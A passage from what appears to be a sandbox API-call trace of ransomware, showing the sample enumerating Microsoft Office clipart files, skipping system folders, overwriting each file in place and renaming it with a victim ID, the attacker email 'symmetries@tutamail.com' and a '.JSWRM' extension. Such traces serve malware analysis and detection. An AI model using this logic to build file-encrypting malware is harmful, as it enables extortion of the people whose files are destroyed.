lpMultiByteStr="DD01138_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0076.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0076.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01138_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01138_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01138_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0076.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.244] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01138_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.244] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3692) returned 1 [0076.244] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe60) returned 0x24c1d0 [0076.244] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xe60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xe60, lpOverlapped=0x0) returned 1 [0076.246] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.246] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xe60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xe60, lpOverlapped=0x0) returned 1 [0076.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0076.246] CloseHandle (hObject=0x460) returned 1 [0076.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0076.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0076.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0076.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0076.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0076.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.246] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01138_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01138_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0076.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.247] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe30, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01139_.WMF", cAlternateFileName="")) returned 1 [0076.247] lstrcmpiW (lpString1="DD01139_.WMF", lpString2=".") returned 1 [0076.247] lstrcmpiW (lpString1="DD01139_.WMF", lpString2="..") returned 1 [0076.247] lstrcmpiW (lpString1="DD01139_.WMF", lpString2="...") returned 1 [0076.247] lstrcmpiW (lpString1="DD01139_.WMF", lpString2="windows") returned -1 [0076.247] lstrcmpiW (lpString1="DD01139_.WMF", lpString2="recovery") returned -1 [0076.247] lstrcmpiW (lpString1="DD01139_.WMF", lpString2="perflogs") returned -1 [0076.247] lstrcmpiW (lpString1="DD01139_.WMF", lpString2="documents and settings") returned -1 [0076.247] lstrcmpiW (lpString1="DD01139_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.247] lstrcmpiW (lpString1="DD01139_.WMF", lpString2="system volume information") returned -1 [0076.247] lstrcmpiW (lpString1="DD01139_.WMF", lpString2="msocache") returned -1 [0076.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0076.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01139_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01139_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01139_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0076.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0076.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01139_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01139_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01139_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0076.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.248] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01139_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.248] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3632) returned 1 [0076.248] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe30) returned 0x24c1d0 [0076.248] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xe30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xe30, lpOverlapped=0x0) returned 1 [0076.250] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.250] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xe30, lpOverlapped=0x0) returned 1 [0076.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0076.250] CloseHandle (hObject=0x460) returned 1 [0076.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0076.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0076.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0076.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0076.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0076.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.251] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01139_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01139_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0076.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.251] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb709c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe20, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01140_.WMF", cAlternateFileName="")) returned 1 [0076.251] lstrcmpiW (lpString1="DD01140_.WMF", lpString2=".") returned 1 [0076.252] lstrcmpiW (lpString1="DD01140_.WMF", lpString2="..") returned 1 [0076.252] lstrcmpiW (lpString1="DD01140_.WMF", lpString2="...") returned 1 [0076.252] lstrcmpiW (lpString1="DD01140_.WMF", lpString2="windows") returned -1 [0076.252] lstrcmpiW (lpString1="DD01140_.WMF", lpString2="recovery") returned -1 [0076.252] lstrcmpiW (lpString1="DD01140_.WMF", lpString2="perflogs") returned -1 [0076.252] lstrcmpiW (lpString1="DD01140_.WMF", lpString2="documents and settings") returned -1 [0076.252] lstrcmpiW (lpString1="DD01140_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.252] lstrcmpiW (lpString1="DD01140_.WMF", lpString2="system volume information") returned -1 [0076.252] lstrcmpiW (lpString1="DD01140_.WMF", lpString2="msocache") returned -1 [0076.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0076.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01140_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01140_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01140_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0076.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0076.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01140_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01140_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01140_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0076.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01140_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.252] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3616) returned 1 [0076.253] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.253] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe20) returned 0x24c1d0 [0076.253] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xe20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xe20, lpOverlapped=0x0) returned 1 [0076.254] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.254] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xe20, lpOverlapped=0x0) returned 1 [0076.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0076.254] CloseHandle (hObject=0x460) returned 1 [0076.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0076.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0076.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0076.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0076.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0076.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.255] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01140_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01140_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0076.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.256] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb709c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x85c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01143_.WMF", cAlternateFileName="")) returned 1 [0076.256] lstrcmpiW (lpString1="DD01143_.WMF", lpString2=".") returned 1 [0076.256] lstrcmpiW (lpString1="DD01143_.WMF", lpString2="..") returned 1 [0076.256] lstrcmpiW (lpString1="DD01143_.WMF", lpString2="...") returned 1 [0076.256] lstrcmpiW (lpString1="DD01143_.WMF", lpString2="windows") returned -1 [0076.256] lstrcmpiW (lpString1="DD01143_.WMF", lpString2="recovery") returned -1 [0076.256] lstrcmpiW (lpString1="DD01143_.WMF", lpString2="perflogs") returned -1 [0076.256] lstrcmpiW (lpString1="DD01143_.WMF", lpString2="documents and settings") returned -1 [0076.256] lstrcmpiW (lpString1="DD01143_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.256] lstrcmpiW (lpString1="DD01143_.WMF", lpString2="system volume information") returned -1 [0076.256] lstrcmpiW (lpString1="DD01143_.WMF", lpString2="msocache") returned -1 [0076.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0076.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01143_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01143_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01143_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0076.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0076.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01143_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01143_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01143_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0076.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.256] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01143_.wmf"), dwDesiredAccess=0xc0000000, 